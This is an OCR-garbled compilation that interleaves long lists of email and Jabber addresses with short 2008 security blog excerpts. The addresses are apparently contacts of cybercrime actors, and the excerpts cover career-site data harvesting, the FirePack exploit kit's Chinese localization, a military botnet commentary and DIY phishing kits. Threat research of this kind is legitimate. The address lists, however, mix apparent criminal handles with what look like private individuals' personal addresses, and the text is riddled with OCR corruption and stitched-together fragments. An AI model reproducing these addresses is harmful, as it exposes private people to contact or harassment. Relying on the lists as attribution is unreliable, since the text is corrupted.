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CustomerService@Bank5Connect.com 
perfectcreet@jabb.im 
italyservis@xmpp.jp 
barakatm@fau.edu 
aliah.abouzeida@gmail.com 
danmothy@gmail.com 
Nathanie.serrano@gmail.com 
Janesejiles@gmail.com 
earajworld@gmail.com 
atim199@yahoo.com 
morgan.williamsO05@yahoo.com 
isaquemoresco@gmail.com 
asuchoff21@yahoo.com 
chyaine.minors@gmail.com 
loisd18@aol.com 
mekroff@aol.com 
tonyasutton77@gmail.com 
gi.barr@yahoo.com 
nmhaupt@gmail.com 
tangawilliams@gmail.com 
kschoch74@gmail.com 
fernando.andres1299@gmail.com 
alitugby@gmail.com 
tlaxer@yahoo.com 
MagicBot@jabbim.ru 
agrex@exploit.im 
smtpspam@shangryla.net 
bratanl123@jabb.im 
11453tungsten@thesecure. biz 
bkirk@beckman.com 
tomvanparis@yahoo.com 
chris.obrien@dynamicselection.co.uk 
tluciano@millerind.com 
zachary.klipstein@gmail.com 
zZ668@jabbim.cz 
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vad42833@gmail.com 
vad428@darknet.im 
SQUR@jabber.at 
SoftButFirm@riseup.net 
Belial@jabber.dk 
amazn@jabber.cn 
zuvara@shangryla.net 
avenger1390@xmpp.jp 
aq3ty@mail.ru 
fabirche@xmpp.jp 
leavingnext3223@exploit.im 
callme@jabber.sk 
baradach@jabber.cz 
CHRector34@mail.com 
paranoid@5222.de 
paranoid@pimux.de 
cocaine0140@xmpp.jp 
prostopro@xabber.org 
egoister55@jabber.ru 
skir@xabber.org 
altiriya@jabber.ru 
nito55@xmpp.jp 
glvskmn@darkdna.net 
allibaba777@xabber.de 
stazisfm@jabber.ru 
damn@jabber.ccc.de 
sam _sam@exploit.im 
windeng@topsec.in 
just _s@xmpp.jp 
artady@protonmail.com 
clasopranoh@exploit.im 
maunt@jabber.ru 
carlos@thesecure. biz 
mr.redroom@jabb.im 


poltergeyst55@jabber.ru 
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mixal84@qip.ru 
boomx1984@gmail.com 
nyplyynn@jabberes.org 
TheArmy@jabbim.ru 
TheArmy@jabb.im 
qwertov@jabber.ru 
makintoh@mpro.la 
whoami987@mail2tor.com 
avshaletip@gmail.com 
avshaletip@xmpp.jp 
fullzinfo@xmpp.jp 
xcom2@xmpp.jp 
support@mpro.la 
blackpointverificationJjabberblackpointverifl@xmpp.jp 
blackpointverifl@xmpp.jp 
Pimp _Alex _91@hotmail.com 
suruman@exploit.im 
mrpink@exploit.im 
mrpink666@protonmail.com 
sweetmika7@exploit.im 
contact@sweetmika7.to 
support@sweetmika7.to 
sweetMika7@sj.ms 
sweetMika7@torxmppu5u7amsed.onion 
z3ro@exploit.im 
scann@jabbim.com 
kingdom@hot-chilli.net 
koval1777@njs.netlab.cz 
Kingdom@jabber.at 
dimentofax@xmpp.jp 
mydeal12@mail.ru 
s-benz@exploit.im 
oldfordec@Onllne.at 
Stahanoff@exploit.im 
Esperanto@exploit.im 
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1987max@exploit.im 
dedic_admin@xmpp.jp 
rdpx@jabberes.org 
support rdpx@jabberes.org 
bushidokeys@exploit.im 
sweeetsweet@default.rs 
Tupok@exploit.im 
delphi444@exploit.im 
Llacoste@exploit.im 
karakurt@OnlLne.at 
malderfox555@exploit.im 
onewhite@korovka.pro 
fkorest@mail.ru 
ggfrryq35hfhk@mail.com 
69833844@gip.ru 
oracul7@exploit.im 
smartbot1@exploit.im 
smartbot1@jabbim.sk 
smartbot@jidhad.biz 
dopedod@jabber.ru 
ministr777@Onl1ine.at 
monkas@exploit.im 
moiomy@exploit.im 
aka moneymaka@exploit.im 
brendy@prv.name 
chumba@jabb.im 
zagzig@exploit.im 
luciq@exploit.im 
luciq@blah.im 
bratan@thesecure. biz 
Stahanoffsky@gmail.com 
install. money@thesecure. biz 
bankboss@jabber.ccc.de 
SLOW-malderfox555@exploit.im 
-malderfox555@exploit.im 
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ToBeDestr-fokan4k33@jabbim.pl 
-fokan4k33@jabbim.pl 
lrazerl@exploit.im 
rdpcrypt@exploit.im 
pont@exploit.im 

Kartell @jabber.at 
canberra1979@jabb.im 
surfer@jabber.cz 
barbieel12@xmpp.jp 
kartell_ @xmpp.jp 
service pal@zloy.im 
support docs@linuxlovers.at 
servis pal@exploit.im 
fox-z@exploit.im 
vicode@thesecure. biz 
foxrdp@exploit.im 
foxrdp@zloy.im 

fox _sup@exploit.im 
5k5k5k@exploit.im 
loadpp@exploit.im 
ivanpetrow@sj.ms 
deepmaster@exploit.im 
julik2015@exploit.im 
prol00doki@exploit.im 
saulgoodman@exploit.im 
lacoste livejabberaskettt@jabb.im 
askettt@jabb.im 
cheapflood@Onllne.at 
cheapflood2@exploit.im 
njef65@jabbim.com 
planetmoney@jabbim.cz 
nsx240x@exploit.im 
959595@jabb.im 
lazara@korovka.pro 
lazara@creep.im 
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torop@exploit.im 
skryptec@thesecure. biz 
justt@Onl1ne.cc 
c3nsOr3d@thesecure. biz 
uslugimailuslugi@gmail.com 
superman007@exploit.im 
entropia@exploit.im 
Jsnoww@exploit.im 
lexter@jabber.im 
sicilian@exploit.im 
miroslavkeys@exploit.im 
humman@exploit.im 
somna@exploit.im 
jorox@exploit.im 
pol3gOn@jabb.im 
instetiq@exploit.im 
shutterstock11@exploit.im 
username@tnv.edu.vn 
leninskii@OnlLne.at 
bomj888@explot.im 
bomj888@exploit.im 
kvazar81@xmpp.jp 
tortila@jabb.im 
goggy@xabber.org 
goldman@jabbim.com 
www2crd@jabb.im 

www _crd@exploit.im 
bazzz@exploit.im 

traffer lot@hot-chilli.net 
oblomoff@xmpp.name 
dedpartner@exploit.im 
proexpert 2016@mail.ru 
vasya1151156@gmail.com 
goodvzlom@jabber.ru 
besmart@jabb3r.org 
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6274besmart@jabb3r.org 
1Insider@xmpp.jp 
foma777333@xabber.org 
getsend777@exploit.im 
insanebiz@codingteam.net 
Ruslanal1816@jabber.ru 
Zedd@exploit.im 
vandyke@jabberes.org 
centrovoy48@xmpp.jp 
blackreal@exploit.im 
Service.hecknet@gmail.com 
ashford0@exploit.im 
ashford@yax.im 
shadder@jabbim.pl 
voron-hak@ya.ru 
zimina2008@yandex.by 
mxdor1l2@mail.ru 
mxdor12@xmpp.jp 
seOsmm@jabber.sk 
Online.help.free.hack@gmail.com 
NeosDionysus@jabber.calyxinstitute.org 
NeosDionysus@elude.in 
fleshpoint@exploit.im 
bmwstyle@blah.im 
hvnc@blah.im 
vpnpro@jabber.ru 
vpnprogo@protonmail.com 
24@exploit.im 
nebes777@qip.ru 

nebes web@zloy.im 
segu86@jabb3r.org 
psi-dev@conference.jabber.ru 
x-element@tutanota.com 
x-ellement@tutanota.com 
vidar_supwwh@exploit.im 
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4.5.11 Major Career Web Sites Hit by Spammers Attack (2008-05-12 19:07) 


[ Start Process ] [ Process List ] [ Archive ] 


Site: ajcjobs.com 
: aicjobs.com 
Login: | aie) 
2s 
Password: | careerbuilder.com-proxy 
careerbuilder.com-socks 


Search string: 


Date (mm/dd/yy): ———s 
[pase aoe _| 
—_— 


What is the future of spamming next to [1]managed spamming appliances, like the ones al- 
ready offered for use on demand? It’s [2]targeted spamming going beyond the segmentation 
of the already harvested emails on per country basis, and including other variables such as 
city of residence, employment history, education, spoken languages, to ultimately set up the 
perfect foundation for targeted spamming and malware campaigns. 


Go through [3]the complete assessment of the tool used for extracting personal data 
from major career sites as well. 


1. http: //ddanchev. blogspot .com/2007/10/managed-spamming-appliances-future-of .htm 


2. http: //ddanchev. blogspot .com/2008/05/segment ing-and-localizing-spam. htm 
3. http://blogs.zdnet .com/security/?p=108 
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sneg@12jabber.com 
diveragent@OnllLne.at 
Dema4@exploit.im 
magspoof@exploit.im 
moskva415@jabb.im 
alhoffman@xmpp.jp 
sunsilk@Onl1ne.at 
risovkapro@xmpp.jp 
bankboss@xmpp.jp 
support-manager@xmpp.jp 
cyberstrannik@jabber.org 
miki@dione.zcu.cz 
7777@shangryla.net 
lyubavaryada@jabb3r.org 
Cvv.me@ccsupport.co 
cvvme2019@0nline.at 
daemonkodd34@cvv.me 
cbr600mot@jabbim.pl 
casky@exploit.im 
freelancer7@jabber.at 
bonjure@exploit.im 
vadim-123@jabber.no 
cifra@exploit.im 
grim@default.rs 
asdfre777sled@xmpp.ru 
beholdrdf888@jabberon.net 
tonysopranoh@bakka.su 
flexIm@jabber.ru 
Skaynet@jabbim.com 
vampire@sj.ms 
alexserver952@procrd.pro 
sellall@xabber.org 
kittis@sj.ms 
greendumps24.com@exploit.im 
pechkinmail@exploit.im 
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pechkinmail@protonmail.com 
webdeveloper@exploit.im 
katecode@xmpp.jp 
configshop@jabber.calyxinstitute.org 
redbull33@xmpp.jp 
yurihuev@safetyjabber.com 
migranoff@exploit.im 
ArcusP@jabber.ru 
chicagoist@tuta.io 
dikiizapad@xmpp.jp 
zedbrute2.0@exploit.im 
crackman@jabber.at 
367111@exploit.im 
mueasik1@jabbim.cz 
geotir@sj.ms 
zulusl117@exploit.im 
rmr92@mail.ru 

ronny _ru@mail.ru 
choosenl@creep.im 
thechoosenl@yax.im 
senl@yax.im 
diadar@kode.im 
diadarO@exploit.im 
confirmed@exploit.im 
nicetraffic@thesecure. biz 
king. lL@jabber.com 
smartdocs@exploit.im 
mg@vipvpn.com 
tartuf@exploit.im 
snejok19@exploit.im 
rsdown@exploit.im 
kolegabtc@exploit.im 
pcd@default.rs 
pcd@securetalks. biz 
lavrovs777@xmpp.jp 
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sewbanks@exploit.im 
sip@xho.ru 
fridrixns@exploit.im 
callmix@draugr.de 
fys88fys87@mail2tor.com 
hd _pl4stic@exploit.im 
gaster@xmpp.jp 
forzatexhack@gmail.com 
kirlian28@gmail.com 
DEMO-bmthkl@gmail.com 
tsar7269@dismail.de 
7269@xmpp.jp 
7269@mpro.la 
dimentofax@mail.ru 
dirtydog2017@xmpp.co 
Blackreal@pandion.im 
mopecrd@exploit.im 
18streetgang@xmpp.jp 
jok@draugr.de 
mirsein@zloy.im 
4.mirsein@zloy.im 
kissa001@xmpp.jp 
asguardsphere@xmpp.jp 
Asguard Sphere@protonmail.com 
support-asguard@jabber.pw 
office@asguard.pro 
support@major.st 
admin@major.st 
support@chigurh.is 
kbksrb@ymail.com 
bilalkhanicompk@jabber.ru 
kingkaka@xmpp.jp 
Realandrare@jabber.otr.im 
realshadowjoker@xmpp.jp 
hiesenbergxxx@xmpp.jp 
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digbucks@xmpp.jp 
nostra@jabbim.com 
Onikus@jabb.im 
cashvdbankjes@xmpp.jp 
hessen@xmpp.jp 

yan dex@exploit.im 
y-a-n-d-e-x@exploit.im 
darkk@exploit.im 
barbaraaraujosm@yahoo.com.br 
liliafelipeevangelista@gmail.com 
arisilveira3@gmail.com 
loreafo@xmpp.jp 
dpassmrk@xmpp.jp 
dpassmrk@gmail.com 
x-million@tutanota.com 
success@strongjabber.cc 
crdz@Onllne.at 
pacan4ik@xabber.de 
support _mak@xmpp.jp 
dr.dumps666@sj.ms 
joker.911@list.ru 

S _belej@meta.ua 
emvking@xmpp.jp 
sytyilutyi@jabber.ru 
boss@armada.im 
anyproxy@jabbim.pl 
leesanders@thesecure. biz 
liberty 789@jabber.ru 
rushldrushld@xmpp.jp 
rushld@xmpp.jp 
pro00@exploit.im 
closed@exploit.im 

alaska _accounts@exploit.im 
31337@verified.pm 
docs777@jabber.otr.im 
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bill brenda2@comcast.net 
hyerize@sbcglobal.net 
misterskript@yahoo.com 
WinstonBrown89@gmail.com 
Marrybrown@gmail.com 
henryhipkins@gmail.com 
hoor3en@jabb.im 
kilogttgo12@protonmail.com 
kilogttgol12@xmpp.jp 
bratik@jabber.cd 
bankbro@exploit.im 
brazil303@exploit.im 
junker@exploit.im 
korrg@exploit.im 
zloyy@zloy.im 
petermortanl1990@gmail.com 
willys@jabb.im 
atlantxxi@jabb.im 
atlantxxi@securetalks. biz 
tartuf@xmpp.jp 
dev.tenebris@exploit.im 
sphere@tenebris.cc 
dev.tenebris@jabber.calyxinstitute.org 
fvision@tenebris.cc 
abcstore@jabber.ru 
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4.5.12 The FirePack Exploitation Kit Localized to Chinese (2008-05-13 15:16) 
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The process of localizing open source malware, as well as publicly obtainable web malware 
explotation kits is continuing to receive the attention of malicious attackers, the Chinese 
underground in particular. Starting from [1]MPack and IcePack’s original localizations to 
Chinese, the [2]FirePack exploitation kit is the latest one to have been recently [3]localized to 
Chinese, and the trend is only starting to emerge. 


What is prompting Chinese users to translate these kits to their native language any- 


way? Is it the kit’s popularity, success rates, lack of alternatives, or capability matching with 
the rest of the internaltional underground community? I'd go for the last point. 


1. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


2. http: //ddanchev. blogspot .com/2008/04/firepack-exploitation-kit-part-two.htm 
3. http://ddanchev. blogspot .com/2008/02/firepack-web-malware-exploitation-kit.htm 
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4.5.13 A Botnet of U.S Military Hosts (2008-05-14 14:40) 


Building [1]DDoS bandwidth capacity for offensive cyber warfare operations may seem 
rational, but this departamental cyber warfare approach would never manage to match the 
capabilities of the self-mobilizing hacktivist crowd : 


" Where's the enemy, and where’s the enemy’s communications and network infrastructure 
at the first place? It’s both nowhere, and everywhere, and you cannot DDoS “everywhere”, 
and even if you waste a decade building up the capability to DDoS everywhere, your adaptive 
enemy will undermine the resources, time and money you've put into the process by avoiding 
outside-to-inside attacks, and DDoS your infrastructure from inside-to-inside. " 


Here are [2]related comments on how unnecessary the whole idea is at the first place. 


1. http: //blogs.zdnet .com/security/?p=109 
2. http: //www.f-secure.com/weblog/archives/00001434. htm 
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Asguard manager@exploit.im 
asguard2323@jabber.pw 
lovestaff@zloy.im 
taimer01@xmpp.jp 
baluuul@xmpp.jp 
mulag1@exploit.im 
freeman161@xmpp.jp 
freeman161@xmpp.name 
mr-live@exploit.im 
antoxal@Onl1Lne.at 
greendot2010@jabber.cz 
msl1@jabb.im 
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tarakanbill@exploit.im 
zifirka@exploit.im 
cv.lawless@pandion.im 
alsource@exploit.im 
canadaplug@jabber-hosting.de 
emptycom@jabber.ru 
onslaught@xmpp.jp 
partymaker2001@jabbim.sk 
julikd@exploit.im 
shmot@thesecure. biz 
koshikdoshik@gmail.com 
koanto@xmpp.jp 
exploiter666@jabb.im 
prince vassago@exploit.im 
mo _dar@Onlline.at 
jimseebeck@exploit.im 
-koanto@xmpp.jp 
discomoney101@exploit.in 
tigerru7 77 @jabberes.org 
voltbox@jabbim.cz 
pisko@dismail.de 
romboy@protonmail.com 
ralphi59@jabber.no 
iservice@jabber.at 
canaan@fysh.in 


ciisco@exploit.im 


customerservice@email-speedycash.com 


vcconly@default.rs 
guzm4n@exploit.im 
pricee@xmpp.jp 
smartcoin@exploit.im 
dr herz@exploit.im 
stivwu@zloy.im 
4.stivwu@zloy.im 


michael dukett@yahoo.com 
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bigsteshn@xmpp.dk 
bigsteshn@jabber.ccc.de 
support@narayana.im 
tbtxtbt@aol.com 
brendy@darkdna.net 
t3t4n@jabb3r.org 
svetakaplauch@gmail.com 
admin@infodig.is 
ionox1@exploit.im 
atkitotojia@tutanota.com 
kitotojia@tutanota.com 
dragunov2000@xmpp.jp 
kB.bank@xmpp.jp 
modernlogs@sj.ms 
modernlogs@protonxmpp.ch 
modernmain@thesecure.biz 
literbkard@mail.ru 
witfip@exploit.im 
high-quality@xmpp.jp 
komersone@jabster.pl 
dp2btc@talkonaut.com 
clayton73@jabber.hot-chilli.net 
hitop@jabber.sk 
vincent@thiessen. it 
lumclember8@xmpp.jp 
geril756@conversation.im 
matlaga@xabber.org 
thekidwest89@gmail.com 
lexlqqq@xmpp.jp 
snowden1488@sj.ms 
dilex1337@xmpp.jp 
ceo@jabb.im 
poper22@protonmail.com 
poper22@sj.ms 
dadi@zloy.im 
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zwshutdownsystem@Online.at 
sales@smartproxy.io 


rossproxy@jabber.de 


kudzhan88@torbox3uiot6wchz.onion 


timothy _timothy@xmpp.jp 
blckhtl1@default.rs 
blckhtl@xmpp.jp 
blackhat@sj.ms 
dexia@exploit.im 

q@q.ru 

horn@exploit.im 
priv618@jabb3r.org 
mamalola1962@hotmail.com 
smccaskill@charter.net 
User5635miron455@jabber.cz 
santa.clauS@jabber.ru 
sharks@jabber.ru 
buddiesO4@xmpp.jp 
kanavaro91@exploit.im 
anti-frod@exploit.im 
bighimikopt@xmpp.jp 
FEIKDOK77@2zloy.im 
-bb@codingteam.net 
spec-c@exploit.im 
bb@codingteam.net 
killacc@jabber.at 
manyhoney@xmpp.jp 
european@jabbim.com 
european@korovka.pro 
parlik299@exploit.im 
pushkin@xabber.de 
leprekon@jabber.cz 
jubus-roll@exploit.im 
jooboos@exploit.im 


jooboos@procrd.pro 
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no-reply@blockchain.info 
unialas@expoit.im 
unialas@exploit.im 
Airtime@jabber.ccc.de 
loads _install@exploit.im 
seller77@zloy.im 
seller77@xmpp.jp 
hpzinl1@exploit.im 
111.111.111@exploit.im 
farshmaher@exploit.im 
farsh.biz@exploit.im 
diak@exploit.im 
columbia@exploit.im 
atyojoze775587@jabber.ru 
it-chaser@tt3j2x4k5ycaa5zt.onion 
brutforce@shangryla.net 
viverl@jabber.ru 
master.rd@outlook.com 
eni.gjikal980@gmail.com 
deeznutz69@hot-chilli.net 
yungrussia2061@conversations.im 
yungrussia@xabber.org 
fanrm@xmpp.is 
harii@xmpp.jp 

s@xta.im 
admin.cif@xmpp.jp 
Tom2214@exploit.im 
desperate@jabbim.cz 
humerlsimon@zloy.im 
parkerproo@exploit.im 
callgula@crypt.am 
paymelannister@jabb3r.org 
titovl.rm@yandex.ru 
zxcvb5@exploit.im 
maxim.maxim2404@gmail.com 
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soke313@hot-chilli.net 
Manscard@thesecure. biz 
promotions@email.888poker.com 
feedback@mailer.888poker.com 
Operations@cassava.net 
feedback@mailer.888.dk 
wufy@xmpp.jp 
DE.1lacoste@exploit.im 
ibogatyr@jabber.ru 
monnoy@xabber.org 
irshadvti@securejabber.me 
s@stuff.im 

777sup@exploit.im 
eurodocen@xmpp.jp 
123.456.789@exploit.im 
tejxali213@xabber.org 
webdesigner@xmpp.jp 
fillwhite1975@gmx.us 
klerk@jabbeng.in 
Upworkbabloss vcc@exploit.im 
babloss vcc@exploit.im 
sam10@expoit.im 
rolikstonr1233@exploit.im 
shoria@exploit.im 
al3p0u@exploit.im 

katya support@exploit.im 
blackman _support@exploit.im 
lixkill@exploit.im 
lixkill@jabber.at 
veneno@exploit.im 
slowmotion1320@xabber.org 
tov.kapitan@jabber.ru 
manticore@securejabber.me 
innermind@jabb.im 


DarkGuy@chatme.im 
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teamliquid@jabber.ru 
gains@jabber.ru 
qyservers@tuta.io 
qyservers@exploit.im 
masoncapital@jabb.im 
rescatorsales@xmpp.jp 
poseidon@jabbim.pl 
obnalchik@korovka.pro 
zero001@exploit.im 
russianhackerclub@jabber.ru 
horizzzon1@exploit.im 
sparios@xmpp.jp 
support@multi-vpn. biz 
teslal8@jabber.ru 
diedramurphy@hotmail.com 
shuttersto@xmpp.jp 
-antary@ajabber.me 
antary@ajabber.me 
richwitch@jabber.se 
3sha@exploit.im 
hihinut@exploit.im 
benz2018@xmpp.jp 
isquintero@aol.com 
armintriol@protonmail.com 
moddiil@exploit.im 
pandascale@conversations.im 
wizard shops@exploit.im 
wizard shops@thesecure.biz 
mrair@exploit.im 
buyer@sj.ms 
baski@jabbim.cz 
goldenmoney@jabber.cz 
novgift@jabster.pl 
black@xmpp.dk 
voroff@xmpp.jp 
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4.5.14 DIY Phishing Kits Introducing New Features (2008-05-15 20:29) 
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: File + 
Phishers: Phisher Code: 
AIM 
Amazon 
AOL 
Bebo 
Chase Bank 
Citi Bank 
Click And Buy 
Ebay 
Facebook 
File Front 
Freewebs 
Friendster 
Game Battles 
Gmail 
Hotmail 
ICG 
iTunes 
Money Bookers 
Myspace 
Nexon 
Paypal 
Photobucket FTP Phisher Directly to server PHP Code: 
Rapidshare 
Ripway Host: 
Runescape 
Skype User: 
Xbox 
Yahoo Mail Pass: 
Youtube 
Path:  /public_html 


Create Phisher 


Factual evidence on the emergence of individual phishing kits is starting to appear, with two 
more available in the wild. So what? For the time being, the lack of communication between 
the authors of these, or perhaps even the need to is slowing down the adoption of core 
features that would standardize and create a dynamic all in one phishing campaign C &C. 


In the long term, however, features and customizations already adopted by [1]ethical 
phishing initiatives, would become the default set of features for public, and not the pro- 
prietary kits that theoretically should act as the benchmark. As in a previous discussion 
on the dynamics of the malware industry and the proprietary tools within, lowering the 
entry barriers into phishing by releasing this applications for free, greatly benefits the more 
experienced phishers, as the novice market entrants would be the ones making the headlines : 


"The [2]DIY phishing kits trend started emerging around [3]August, 2007, with the distribution 
of a simple kit (screenshots included), whose objective was to make it easy for a phisher already 
possessing the phishing page, to enter a URL where all the data would be forwarded to. Several 
months later, [4]the kit went 2.0 (screenshots included) and introduced new preview, and 
image grabber features in order to make it easier for the phisher to obtain the images to be 
used in the attack. In early 2008, two more phishing kits made it in the wild, with the first 
once having direct FTP upload capabilities as well DIY Phishing Kit as automated updating of 
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monkaSmonkas@exploit.im 
hpzin@exploit.im 
hpzin@jabber.hot-chilli.net 
hpzin@Online.cc 
lexter@jabbim.com 
birsamurai@bk.ru 
alekseev@jabb3r.org 
Axsing@bigmir.net 
microdo52@exploit.im 

the _wire@exploit.im 
the.wire.777@gmail.com 
jabbercash@exploit.im 
valhalla@jabbim.cz 
assad@jabber.ccc.de 
soryf@jabb3r.de 


partnershipdroproject@xmpp.jp 


callforall@exploit.im 
592634256@qq.com 
greshnikOOO@jabber.ru 
richwitchh420@xmpp.jp 
bossss@exploit.im 
Ak2slappy@hot-chilli.net 


simple _ransomware@xmpp.jp 


bondspam@exploit.im 
rakeOO@creep.im 
f.szucs@mail.com 


6ix9ine663@protonmail.com 


TheRealDealer1@protonmail.com 


nycesun@jabber.ru 
xr9kayu@xmpp.jp 
quaterback@jabber.no 
telephone@xmpp.jp 
sparta@jabber.at 
callsupport@swissjabber.ch 


heisenberg@macjabber.com 
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boom54@conion.im 
Boom54@exploit.im 
botox@exploit.im 
admin@superhost.com 
moms@sj.ms 
ghostlab@jabber.at 
markus@im.hot-cilli.eu 
cardinger@exploit.im 
Blackbiz@thesecure. biz 
paul.ditrade@gmail.com 
anonymous-buyer@jabbim.ru 
3lanonymousbuyer@gmail.com 
savagegarden55@securejabber.me 
zlaya_sobaka@exploit.im 
hfjess@jabb.im 
grindewald@xmpp.jp 
horselessjockey@xmpp.is 
roccov2@thesecure. biz 
rocco.gf@mail.ru 
bolemia@creep.im 
widower@exploit.im 
kirilovadgo@xmpp.jp 

alisa black@sj.ms 
nagaewaan@yandex.fr 
abracadabra@jabb.im 
map144@exploit.im 
Cnbuyer@xmpp.jp 
DonaldTrump@hotmail.com 
rjmillerlife@gmail.com 
nathwilll@jabber.org 
need247997@yax.im 
them247997@yax.im 
bro247997@yax.im 
pcs247997@yax.im 
those247997@yax.im 
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247997@yax.im 
54247997@yax.im 
now247997@yax.im 
time247997@yax.im 
too247997@yax.im 
hold247997@yax.im 
donfan5@jabbim.sk 
sassuke@jabb3r.de 
Intro _vert@exploit.im 
paramorerss@exploit.im 
online242@exploit.im 
033@jabbim.sk 
uniexbiz@gmail.com 
ringo@thesecure.biz 
S3ller@protonmail.ch 
s3ller@exploit.im 
project0001@xmpp.jp 
rublev@exploit.im 


rublev@draugr.de 


firstname.lastname@live.com 


jafojofather@jabbim.ru 


idmarketO7@mail2tor.com 


usvhsn@anonarchy.im 


fuller@xmpp.jp 


apmucm1337@exploit.im 


neizvestnost74@jabber.cd 


octopusdos@exploit.im 
detroid@safefast.co 
darkdav@xmpp.jp 
kentavrs@exploit.im 
docwin912@Onlline.at 
kentavr88@Onl1ine.at 
zsand10@comcast.net 
instaboomoff@gmail.com 


RealAndRare@omerta.im 
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Nostradamus@wwf.tl 

boc _man@exploit.im 
dolbimus@jaber.pro 
vikontesssi@xmpp.ru 
Carlklein@jabber.de 
sasa34s@jabber.ru 
anatolia@exploit.im 
brancher@exploit.im 
armintirol@protonmail.com 
9851691476italyservis@xmpp.jp 
kredo2@jabber.ccc.de 
balkon@tuta.io 
sheikh@exploit.im 
Psheikh@exploit.im 
gbp@exploit.im 
mayliza_99@yahoo.com 
dropsale@xmpp.jp 
nimetazepam@xabber.de 
aartjansimon@outlook.com 
ccleol000@jodo.im 
zennyx@disroot.org 
vas38085@gmail.com 
tanto@xmpp.jp 
oshin@jabb3r.de 
supremedata@jabber.hot-chilli.eu 
kfv4b8diveragent@exploit.im 
everlOw@jabb.im 
skalpel556@jabber.sk 
azbujh893@protonmail.com 
JfG3Scizx2R@exploit.im 
im500@exploit.im 
nathan.a.fournier@gmail.com 
maximumspeed@jabbim.cz 
companytaxrefund@exploit.im 
taxrefund@exploit.im 
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vanguyen@yandex.com 
freddycryger@exploit.im 
zerkje@exploit.im 
online242@xmpp.jp 
online-24@default.rs 
Cukator@jabbim.cz 
subj.gbp@exploit.im 
numerik53@xabber.org 
jefftheinnO@exploit.im 
tanto@exploit.im 
foofficial@null.net 
phishkingz@exploit.im 
jussell@jabbim.com 
vpnstoress@exploit.im 
mariane@yahoo.com 
billhill@OnILne.at 
blackairbnb@jabber.ru 
kivan@zloy.im 
ddos404@xabber.de 
shaoli@xmpp.jp 
reserve@thesecure. biz 
elliot@exploit.im 
zhizhou@xmpp.jp 
kairOS@exploit.im 
lautinyeung@jabber.at 
plot63@exploit.im 

Jsph _dump@0Onl1ine.at 
joseph@mazafaka.info 
xantixdrugx@xmpp.jp 
nighthawkO0@protonmail.com 
zdesign@jabber.cd 
info@atlantic-gmbh.com 
kim.sippel@atlantic-gmbh.com 
perolari.it28867@perolari.it 
perolari.itl16830@perolari.it 
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zagruzka@exploit.im 
steez@Onl1ne.cc 
azerfud@exploit.im 
persival@exploit.im 
Veg3ta@jabb.im 
Veg3ta@jabber.cz 
goldleaves@jabber.cz 
JohnSnoy228@gmail.com 
newmancharles455@gmail.com 
tanto@xmpp.name 
darksoul019@xmpp.jp 
methodccmaster@exploit.im 
FoxDrunsoloveil1@exploir.im 
soloveil1@exploir.im 
avtor@jabbim.com 
bsg/777@creep.im 
pishiteaplexpetrov@mail.ru 
aplexpetrov@mail.ru 
profisher@xmpp.jp 
richlogs@thesecure.biz 
monkeybrain@jabb3r.org 
jack-usa@exploit.im 
md5@4ept.net 
killer955@xmpp.jp 
jackripper@xmpp.jp 
Powersell@exploit.im 
moneyton@exploit.im 

big tony@exploit.im 
mamba911@jabber.cz 
professional-xx@xmpp.jp 
zero500@jabber.hot-chilli.net 
Braanbaa@jabbim.com 
upstate@jabber.at 
rashmir@jabb3r.de 


jabbermanatools@jabberes.org 
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jimmy022@secmail.pro 
armcorp@exploit.im 


galss13@exploit.im 


Hackerzhome2018@hotmail.com 


dollarl1@jabb.im 


psholashillnaxyi@protonmail.com 


jon007@xabber.org 
unknown@jodo.im 
thund.hack7@inbox.ru 
maximanus@jabber.ru 
koukoujan@xmpp.jp 
miyos@exploit.im 
otrisovki usa@exploit.im 
hitesh@exolit.im 
213ufo@gmail.com 
Dogetorment@exploit.im 
torment@exploit.im 
falonzor@ajabber.me 
kleopatra2@jabber.sk 
apexglide@exploit.im 


apexglidetm@protonmail.com 


cmaster1900@xmpp.jp 
sweeetsweet@exploit.im 
cooby@exploit.im 
fud.pages@exploit.im 
inform@audia6.cc 
roflanebalo@exploit.im 
swordfishs@jabber.ru 
donklon@exploit.im 
rdp777@zloy.im 
rdp777@darknet.im 
abilton@yahoo.com 
vIk2314@xmpp.jp 
KeyWe@jabber.otr.im 
-trenace@jabb3r.de 
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sestrichka@xmpp.jp 
darkro@exploit.im 
opxhack@jabb.im 
komersantwwh@xmpp.jp 
ninjazzcOde@exploit.im 
sinet@codingteam.net 
Sonym@jabbim.pl 
lovelyfun@xmpp.jp 
abuse.service@exploit.im 
qbok@xmpp.jp 
makdev@jabber.ccc.de 
arturfenix@exploit.im 
jaholloway86@hotmail.co.uk 
academik@xmpp.jp 
srrudral8@jabber.no 

lu _exchange@sj.ms 
hyji@exploit.im 
hyji@torbox3uiot6wchz.onion 
prof@xmpp.jp 
proffy@exploit.im 
baloo@chatme.im 
anti99go@jabber.cz 
russianmafia@thesecure. biz 
starchik@jabber.cz 
chegava@exploit.im 
spider.man@xmpp.jp 
efxforlife@jabber.at 
valve@exploit.im 
savastanos@protonmail.com 
coconutman123@jabber.at 
santamimo@protonmail.com 
alison@exploit.im 
saft@yax.im 
bigddosboss@xmpp.jp 
bggirll986@xmpp.jp 
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yblu dok _station@jabber.ccc.de 
ChillClinton@creep.im 
pinok41@jabber.cz 
mailspamservice@xmpp.jp 
oxfilen@jabber.org 
swOrdflsh@neko.im 
usabankdrop@jabber.ru 
moren _darwin@Onl1ne.at 
kamo@jabbim.ru 
antidetect support@exploit.im 
sensei8808@jabber.ccc.de 
100 _kk@xmpp.jp 
toxaold@xmpp.jp 
kingstravel@xmpp.jp 
kingstravel@jabber.at 
travel@exploit.im 
ezh@jix.im 
nikijackson206@gmail.com 
freeman161@exploit.im 
abood@xmpp.jp 
1007@exploit.im 
rdpsupport@xta.im 
rudedik@exploit.im 
marcus@cerberus.la 
fsc444@xmpp.jp 
nervniy@jabbim.com 
hoymac@jabbim.com 
pan4roma@xmpp.jp 
chugster@tigase.im 
creed1638@gmail.com 
check-usa@exploit.im 
check-x@jabber.no 
kestovicius@blabber.im 
foster784@xmpp.jp 
clays@xabber.org 
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nbgOx1@xmpp.jp 

trojan _cc@xmpp.jp 
retronet@jabber.de 
blasman@exploit.im 
OnewcenturyO@xmpp.jp 
brosafari@exploit.im 
the _felkOn@bakka.su 
felkon@exploit.im 
herme7@sj.ms 
herme7@draugr.de 
lohmen@exploit.im 
devilrockyjess@xmpp.jp 
devilrockyjess@exploit.im 
jojorocks366@yax.im 
sector123@exploit.im 
cifral@xmpp.jp 
xeksec@mazafaka. info 
magicbot@exploit.im 
alex1586@mail.ru 
